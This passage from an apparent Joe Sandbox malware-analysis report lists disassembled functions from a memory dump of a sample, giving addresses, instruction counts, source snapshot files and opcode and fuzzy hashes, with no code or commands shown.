                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91200813f2d3d805ef90efe737a3c919c2cb81ccc370db62557b2785e0eb0cc3
                                                  • Instruction ID: 05b6e6d0b450f33c8aa98c674c2a8f9d9424e5e0337dfa2d0990466d4861a78e
                                                  • Opcode Fuzzy Hash: 91200813f2d3d805ef90efe737a3c919c2cb81ccc370db62557b2785e0eb0cc3
                                                  • Instruction Fuzzy Hash: AE414630B1DA5E4FE7399F6484640797BA2EF99700F11417FD0AAC71A6DF38A9828341
                                                  Function 00007FFD9B879F5F Relevance: .1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c781b41abfa87b751ffb91101c2dbd1c7b8aeca8c3b3a591cca50a8c79e4166b
                                                  • Instruction ID: 59d4a5ea4a3f5ec906591239fcec4e11971b5a0e7d8d2a93c4106a9961bf2259
                                                  • Opcode Fuzzy Hash: c781b41abfa87b751ffb91101c2dbd1c7b8aeca8c3b3a591cca50a8c79e4166b
                                                  • Instruction Fuzzy Hash: 3F311104B1981E4FEE5FB6E8F17557C98469F86608F1408B8E13FD27CBCF2DA9019545
                                                  Function 00007FFD9B888259 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ff6e5f64d96474e2a8c54b2630b3203837f10983c7c34a79bbac24a1ab1817d
                                                  • Instruction ID: 3b818115239f0e4032f0bf447342188b40062bb0f34351124289430a4e668510
                                                  • Opcode Fuzzy Hash: 8ff6e5f64d96474e2a8c54b2630b3203837f10983c7c34a79bbac24a1ab1817d
                                                  • Instruction Fuzzy Hash: 6E316E20B1DA9A4FD77A8B6084650797BE1EF99701B15417ED0DBC3597DE3CA5838340
                                                  Function 00007FFD9B88B679 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e81bdcdb3af4b296d9bcd71c811a7c2deb53bda99bb141548774950a324dd4e
                                                  • Instruction ID: cfe644f448463474a740f16c5cc4ec66af5d66dd371d5a0d18a907ff38e67f77
                                                  • Opcode Fuzzy Hash: 0e81bdcdb3af4b296d9bcd71c811a7c2deb53bda99bb141548774950a324dd4e
                                                  • Instruction Fuzzy Hash: FD315C31A1CA514ED71DA628A8669FAB7D0EF99324F0404BFF09F831D7ED2474428386
                                                  Function 00007FFD9B88B878 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4ec40ba8c3570b33b414dd893cb09d20a830986c0e0c708f768660771476a3d
                                                  • Instruction ID: c3b9b97b1258c601c9f86a4a5fc8f493b55dd91949c2ea99379eb951c7b2a632
                                                  • Opcode Fuzzy Hash: e4ec40ba8c3570b33b414dd893cb09d20a830986c0e0c708f768660771476a3d
                                                  • Instruction Fuzzy Hash: 8B31C771A18B0C4BDB68EB1884969BA77E2EFDC750F05463EE44AD3261DE30B94286C1
                                                  Function 00007FFD9B8B9EB0 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee76aabe9f0fb76ffd5b324120b771c3130ce8d5e444301eb25d3865bd7cc5ca
                                                  • Instruction ID: bc0d380f18a77a3fcbd934e972c1d22430ba7eda18643c5a270a3696a1707804
                                                  • Opcode Fuzzy Hash: ee76aabe9f0fb76ffd5b324120b771c3130ce8d5e444301eb25d3865bd7cc5ca
                                                  • Instruction Fuzzy Hash: C4418F31A19F1E9BEAB4DB6884A4A72B3D1FF9C750F45063DD04AC36A1DE35F9418B80
                                                  Function 00007FFD9B872BFC Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0401e447e583e5b6227ab747274dc249c69ca287deeba1f464491a246dc3c5d9
                                                  • Instruction ID: e78ed2019e9e4b2c8aa81b14b506e5c101af8e0c9d30dbc2e41723628a27e712
                                                  • Opcode Fuzzy Hash: 0401e447e583e5b6227ab747274dc249c69ca287deeba1f464491a246dc3c5d9
                                                  • Instruction Fuzzy Hash: 9731A231908A0C8FDB68DB98D8457F9B7F1FB99311F00826ED04ED3695CF71A9558B80
                                                  Function 00007FFD9B87DE98 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9ffa4851d9627fbd16d412bb75a04dc1061cca1c007564239ae05762e18ab27
                                                  • Instruction ID: f5b9769f907dd2c7290539521d02500134ff01cab66d96453f703a59dacf366b
                                                  • Opcode Fuzzy Hash: d9ffa4851d9627fbd16d412bb75a04dc1061cca1c007564239ae05762e18ab27
                                                  • Instruction Fuzzy Hash: 7D411C6248E7C24FD35383B098759927FB0AE97224B0E46EFD4C0CF4A3E1495A4AC363
                                                  Function 00007FFD9B879ECA Relevance: .1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af7ca998dc9fcec2bd8237b844abec74ad8b635b6d9ad32c09c48dc0e49ee083
                                                  • Instruction ID: d00f56bd8d7447f10d4d32388c7a3b2a2b261f2d74434be64fc2660948e69984
                                                  • Opcode Fuzzy Hash: af7ca998dc9fcec2bd8237b844abec74ad8b635b6d9ad32c09c48dc0e49ee083
                                                  • Instruction Fuzzy Hash: 41311004B0981E4FEE5FB6E8F1755BC58469F86608F1408B8E13FD27DBCF2DA9019545
                                                  Function 00007FFD9B879E11 Relevance: .1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb872704dccfc6002e648b2440e09e76812771efdbc87e1128c12e2a533293e5
                                                  • Instruction ID: f2e566424effde795c78e2ccb37d8da1bea267dfce6a70261b60b7e744f902f0
                                                  • Opcode Fuzzy Hash: cb872704dccfc6002e648b2440e09e76812771efdbc87e1128c12e2a533293e5
                                                  • Instruction Fuzzy Hash: E941056172891A9BEB8DE76C9861FF5B3D2FF98700F604176901DC32C6DE68BC518781
                                                  Function 00007FFD9B888D96 Relevance: .1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f9cc3c99894b5f422b6cf245d13d792a9592dd7a23e584652aa58580838893e
                                                  • Instruction ID: fe9b43fa2c572ff224d96b48bb866edcefee9b7cbda51861af253e94de6b0ea9
                                                  • Opcode Fuzzy Hash: 0f9cc3c99894b5f422b6cf245d13d792a9592dd7a23e584652aa58580838893e
                                                  • Instruction Fuzzy Hash: 7041E531A0E6C64FE327977488616257FA1AF07254B1E02EAC0E5CB2F7DD6C6407C362
                                                  Function 00007FFD9B88A3A8 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a6ff4b2231d42c53ccbea5f4ae1a378e8bd44faf51430170efc975ae17870fd
                                                  • Instruction ID: e427887d0410b8768ca600d2393e4b5450d0bbd7f99e14afe56994ff9c913305
                                                  • Opcode Fuzzy Hash: 2a6ff4b2231d42c53ccbea5f4ae1a378e8bd44faf51430170efc975ae17870fd
                                                  • Instruction Fuzzy Hash: A8310661B1EE1E4FFBB8ABAC54A967567C1DFAC361B01017AE40DC32A6DC15ED824780
                                                  Function 00007FFD9B87E84A Relevance: .1, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3ff8bdf81954bdc1b9c73483eaeb8da086f36b46713afde330dbb3cc0e7d94d
                                                  • Instruction ID: 9cefe16b8d6bd191230af98e9a06347cfae5bab3265538416ca82213c354a9b8
                                                  • Opcode Fuzzy Hash: d3ff8bdf81954bdc1b9c73483eaeb8da086f36b46713afde330dbb3cc0e7d94d
                                                  • Instruction Fuzzy Hash: 4B312F31B1990E8FDB98EF58D4A1BAA73E2FF98314F504175E41DC3296CA34E952C781
                                                  Function 00007FFD9B87412B Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b372d498820cc1141ac86b0c2712cdcecb493a022b3d4ebd440b126d22c605bf
                                                  • Instruction ID: 49a4d75b01c43e4033c94654ff0fdfeeb01bbf9d916eeda097685de329877f36
                                                  • Opcode Fuzzy Hash: b372d498820cc1141ac86b0c2712cdcecb493a022b3d4ebd440b126d22c605bf
                                                  • Instruction Fuzzy Hash: 74318231B1990E8FEB94DF58C8A16BD73A1FF98315F15413DD41AC3295CA34A852CB50
                                                  Function 00007FFD9B8A8840 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc6bd15925617f865f37be67905dcd5fd002363c4fd1da651dc34e8b44987383
                                                  • Instruction ID: 6345e5155e9331cd148967c2b3adc502d2dfe08b8413aad1dcbdfd689f630761
                                                  • Opcode Fuzzy Hash: dc6bd15925617f865f37be67905dcd5fd002363c4fd1da651dc34e8b44987383
                                                  • Instruction Fuzzy Hash: 0F213A31B0991D0FEFE8EB2C9864B7837D2EF9D351B4100BAE50DC32AADD1A9C424780
                                                  Function 00007FFD9B8798F8 Relevance: .1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 620e7a080b9b0a0b3c3d6ab5fc478ebfd235482beb04cf76f2c92b0dc8c2acca
                                                  • Instruction ID: a4773e663e7caa4b62152bcafb48377f0e964f2fe8542f092d4433830d89d433
                                                  • Opcode Fuzzy Hash: 620e7a080b9b0a0b3c3d6ab5fc478ebfd235482beb04cf76f2c92b0dc8c2acca
                                                  • Instruction Fuzzy Hash: D7317304B09C1E4FEB5FB6E8A1756BC5586DF89604F1404B4D02FD36CBCF2DA9029642
                                                  Function 00007FFD9B88A338 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 744ccd1e90490b0d331a1020f756534c520265fe551c26523cef86a6f23e087f
                                                  • Instruction ID: 0db44b187b1572c67f9d0e7e1d2bfd7f59f2579d0d5b33ab97edd18e1068c76b
                                                  • Opcode Fuzzy Hash: 744ccd1e90490b0d331a1020f756534c520265fe551c26523cef86a6f23e087f
                                                  • Instruction Fuzzy Hash: 9F31C43071EA0D4FDBA4EBAD806467677D2EB9C310B50497DD40DC32A6DC28E9458340
                                                  Function 00007FFD9B8797AA Relevance: .1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4c3ec88eaebc3d71a985de90ebad1528a07c3c3f72cf732de438d321ff07819
                                                  • Instruction ID: 6aa11fd2566fafc7ea6c62ccc91a8ef2f9e8bf3c83942fdd8b4759705ecd0473
                                                  • Opcode Fuzzy Hash: c4c3ec88eaebc3d71a985de90ebad1528a07c3c3f72cf732de438d321ff07819
                                                  • Instruction Fuzzy Hash: DC31AA52F1EA4E5EF7A6971C00643A016E3EFEA388F9644FAC04CC31EAED25A801C340
                                                  Function 00007FFD9B879863 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f46df3a9953e16b0e248009809eda3514e0e7c6856ff223bf43ef02676d5908
                                                  • Instruction ID: 4d981642baed371f4070067adc8a0f20fc1af7a9a34f366be10f390be114a73a
                                                  • Opcode Fuzzy Hash: 6f46df3a9953e16b0e248009809eda3514e0e7c6856ff223bf43ef02676d5908
                                                  • Instruction Fuzzy Hash: A9212104B09C0E4FEB5FB6E8A1756BC9986DF89608F1404B9D12FD36CBDF2DA9029641
                                                  Function 00007FFD9B8714F4 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b0af5a1b2876508337220b04e4f2037167edd0d91f6422f6d20104e9189fa51
                                                  • Instruction ID: bcb8ba58f5937acefb00d9cafd708f8d7e7c6814aab8a61a620aad4b89206bd1
                                                  • Opcode Fuzzy Hash: 0b0af5a1b2876508337220b04e4f2037167edd0d91f6422f6d20104e9189fa51
                                                  • Instruction Fuzzy Hash: BC419570F2551D9EEF94EBA4C8A6AECB7B1EF49704F510479E01DA72A6CE3429819B00
                                                  Function 00007FFD9B8847D2 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7dfff2ea66dfb55d26473f3a4d571c92023cf40c5801b3f992dc9d1feddccd87
                                                  • Instruction ID: f84c81a1e9b768a3c8876dadc18c2555f86518ba300dbde5b561b207cfaba884
                                                  • Opcode Fuzzy Hash: 7dfff2ea66dfb55d26473f3a4d571c92023cf40c5801b3f992dc9d1feddccd87
                                                  • Instruction Fuzzy Hash: BE313235A0894E8FDF98DF5CD494BA977E1FFA8300F144169E419C729ADE34E942CB80
                                                  Function 00007FFD9B88347A Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7466fc2255c9329ba9f6f8359777a23af5a17c564c20766ab55a0207b8f2755
                                                  • Instruction ID: 369795f677eed1113c6ac4ebd2d845b69756ad183bac4d2ce4d93cbe66740dfd
                                                  • Opcode Fuzzy Hash: f7466fc2255c9329ba9f6f8359777a23af5a17c564c20766ab55a0207b8f2755
                                                  • Instruction Fuzzy Hash: 1A31E531A09A4E8FEB98DF58C8907EA73E2FF5C310F554179E42AD7295CA35E842CB40
                                                  Function 00007FFD9B8806AA Relevance: .1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8567adb20a4fa8ff325c7409cbe2a404dfd5c4614a97948bc760ff98f3f06a86
                                                  • Instruction ID: 44807b36621668825e12149f3863e1f767e1d586a3721031389a67f094be3a7d
                                                  • Opcode Fuzzy Hash: 8567adb20a4fa8ff325c7409cbe2a404dfd5c4614a97948bc760ff98f3f06a86
                                                  • Instruction Fuzzy Hash: B221E836F2AD5E8BF774B7A458211F97390EF89710F020176D47CC30E2DD3A6A1A0A81
                                                  Function 00007FFD9B88A755 Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8fe1bd91d2035625ad2e91b565e2d3874c26261f887e7114c4216c4f0c036d9c
                                                  • Instruction ID: c3d771c9e8180519d84b0352f4ebaa18bbb396a05310ab9d53b68314a60217c9
                                                  • Opcode Fuzzy Hash: 8fe1bd91d2035625ad2e91b565e2d3874c26261f887e7114c4216c4f0c036d9c
                                                  • Instruction Fuzzy Hash: 90210230B1AA1A4BD338964C94656B573D1EFCD711B1643BFE48EC32AADE24BC0286C0
                                                  Function 00007FFD9B87998D Relevance: .1, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49340104afa659c00d8a857290ffcf38e186278c407dcd06ba6ff710708ecfa7
                                                  • Instruction ID: e899fbcecf01e366d2b7c27b2fbffbe09b50891141a6699fa8291b88ec35800a
                                                  • Opcode Fuzzy Hash: 49340104afa659c00d8a857290ffcf38e186278c407dcd06ba6ff710708ecfa7
                                                  • Instruction Fuzzy Hash: 0921E104B0980E4FEE5FB6E8F1756BCA4869F89604F1408B8D13FD27CBDF2DA9029641
                                                  Function 00007FFD9B8790F0 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43d536a4e6bc84a95652fea7ba149eb955557937d3bf38f93ffcb7ac17e1fa2f
                                                  • Instruction ID: 9c6376009ce26241a29974740640be8ea7287974a887a006a5ba3fba104d5316
                                                  • Opcode Fuzzy Hash: 43d536a4e6bc84a95652fea7ba149eb955557937d3bf38f93ffcb7ac17e1fa2f
                                                  • Instruction Fuzzy Hash: 2331AB51B1ED4F0FF76AA3A854683B81A82EF99348F8544B9D04DC70EBDD28A902C341
                                                  Function 00007FFD9B8797CE Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 927db225342169243f469172436d4b1531bf15a2856a33119cd24ccf84649b8e
                                                  • Instruction ID: 2dcf31e254737d1708c87ae732cf41b7f5d5becd848fecf269d7bcb3bcaff169
                                                  • Opcode Fuzzy Hash: 927db225342169243f469172436d4b1531bf15a2856a33119cd24ccf84649b8e
                                                  • Instruction Fuzzy Hash: 28219604B0995E4FEB5FB7E8A1756BCA982CF8A204F1408F9D16FC36DBCF2D59029641
                                                  Function 00007FFD9B879739 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 22aac2717ad0b3abf8ac63ae7d04e91910a44843eb501991c38a540a718c33fe
                                                  • Instruction ID: 5856ed2f518d3a360e9071226e7c1c7d0df71326a42c4d86c48efc940a788c4a
                                                  • Opcode Fuzzy Hash: 22aac2717ad0b3abf8ac63ae7d04e91910a44843eb501991c38a540a718c33fe
                                                  • Instruction Fuzzy Hash: 32219404B1980E4FEB5EB7E8E0756BC54829F89608F1544B8E12FD36DBDF2DA9029641
                                                  Function 00007FFD9B879AB7 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abfd3c88b106175267aa6334e558fb2a9e0259f241959b7a09ea10b44b1332ed
                                                  • Instruction ID: de4a1b692a4f9df9afff60bb84b94be27c1a817b3a894fdf5ee170d3ed9f45a0
                                                  • Opcode Fuzzy Hash: abfd3c88b106175267aa6334e558fb2a9e0259f241959b7a09ea10b44b1332ed
                                                  • Instruction Fuzzy Hash: B2217404B1981E4FEE5F76E8F17597C98469F8A608F1408B8D13FD27CBCF1DA5019645
                                                  Function 00007FFD9B88B8F8 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f3b8d92692561149e6759b79f7adcecad512312f8bc5c8b37cbbf9fc654ef999
                                                  • Instruction ID: cd4e8565c334918d48b81688a941f96616bf81abff71d53ca34672b9b5717b5e
                                                  • Opcode Fuzzy Hash: f3b8d92692561149e6759b79f7adcecad512312f8bc5c8b37cbbf9fc654ef999
                                                  • Instruction Fuzzy Hash: 2221077170DF0C5FE7A4A71C985A47A73D0EB98260B01063FE44AC3272ED24BD428683
                                                  Function 00007FFD9B8896E7 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d1633e390fb159e7e749bb8052d0a816657e03a8d011c7b85e546ba470615e65
                                                  • Instruction ID: 013a565dcd91ec2018b5413534705f6d9e01f3ceaf8c01d73f159f9dd5ef067c
                                                  • Opcode Fuzzy Hash: d1633e390fb159e7e749bb8052d0a816657e03a8d011c7b85e546ba470615e65
                                                  • Instruction Fuzzy Hash: 19216031719D084FD7ACEA1CD859A7577E1FBAD310B1501AEE04EC36A6EE25EC46C780
                                                  Function 00007FFD9B8896E8 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
